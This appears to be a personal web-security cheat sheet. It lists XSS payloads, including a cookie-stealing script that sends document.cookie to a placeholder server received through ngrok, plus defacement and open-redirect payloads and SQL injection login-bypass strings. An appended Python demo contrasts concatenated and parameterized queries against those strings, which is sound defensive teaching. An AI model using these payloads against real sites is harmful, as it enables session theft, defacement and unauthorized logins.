The goal of this page is just to get attention.
Why should I seriously write up payloads online when there are already thousands of them available for any type of vulnerability?
Anyway, I suggest these websites to study or review vulns!
https://www.invicti.com/learn/
https://www.hacksplaining.com/lessons
https://portswigger.net/web-security
- Generic XSS payloads
- Various boolean based SQL injection payloads
<script>document.location="http://yourserver.com/?c="+document.cookie;</script>
For example, to start a little server with PHP and ngrok I do:
php -S localhost:<port>
ngrok http <port>
Achieve Open redirect
<script>window.location="https://example.com"</script>
Useful if a deface is needed
<script>document.getElementsByTagName('body')[0].innerHTML="jamal";</script>
<script>document.body.innerHTML = 'jamal';</script>
Just search on Google; you will find a lot of ways to escape filters
<script>alert("hello")</script>
document.write(location.search("><svg onload=alert(1)>"))
<svg/onload=alert("hi")>
<img src=x onerror="alert('hello');">
<iframe src="javascript:alert(1)"></iframe>
<var onmouseover="prompt(1)">move the cursor here</var>
<script>alert(window.origin)</script>
<script>alert(document.cookie)</script>
<script>confirm(document.domain)</script>
Taken from this website, "SQL injection cheat sheet" by Invicti (a read is strongly suggested)
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
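For review from the fixing side, here is an added example (not part of the original page) that feeds the username strings listed above to a login check written two ways: SQL built by string concatenation, and the same query with bound parameters. The table, the account and the function names are made up for the demo, and the engine is an in-memory SQLite database.

```python
import sqlite3

# Strings copied from the list above, used as the "username" field.
PAYLOADS = ["admin' --", "admin' #", "admin'/*", "' or 1=1--", "' or 1=1#",
            "' or 1=1/*", "') or '1'='1--", "') or ('1'='1--"]

def make_db():
    """Constructed sample data: one account in an in-memory database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return db

def login_concat(db, name, password):
    """Vulnerable form: user input becomes part of the SQL text."""
    sql = ("SELECT name FROM users WHERE name = '" + name +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        # The input produced SQL this engine rejects. Whether a given string
        # parses depends on the engine and on the shape of the query.
        return False

def login_param(db, name, password):
    """Hardened form: input is bound as data and never parsed as SQL."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return db.execute(sql, (name, password)).fetchone() is not None

def compare(password="wrong"):
    """Map each string to (concat_result, param_result) for a wrong password."""
    db = make_db()
    return {p: (login_concat(db, p, password), login_param(db, p, password))
            for p in PAYLOADS}

if __name__ == "__main__":
    for payload, (concat_ok, param_ok) in compare().items():
        print(f"{payload!r:22} concat={concat_ok!s:5} param={param_ok}")
```

With bound parameters every string is just a username that does not exist, so the result does not depend on which comment syntax the database accepts.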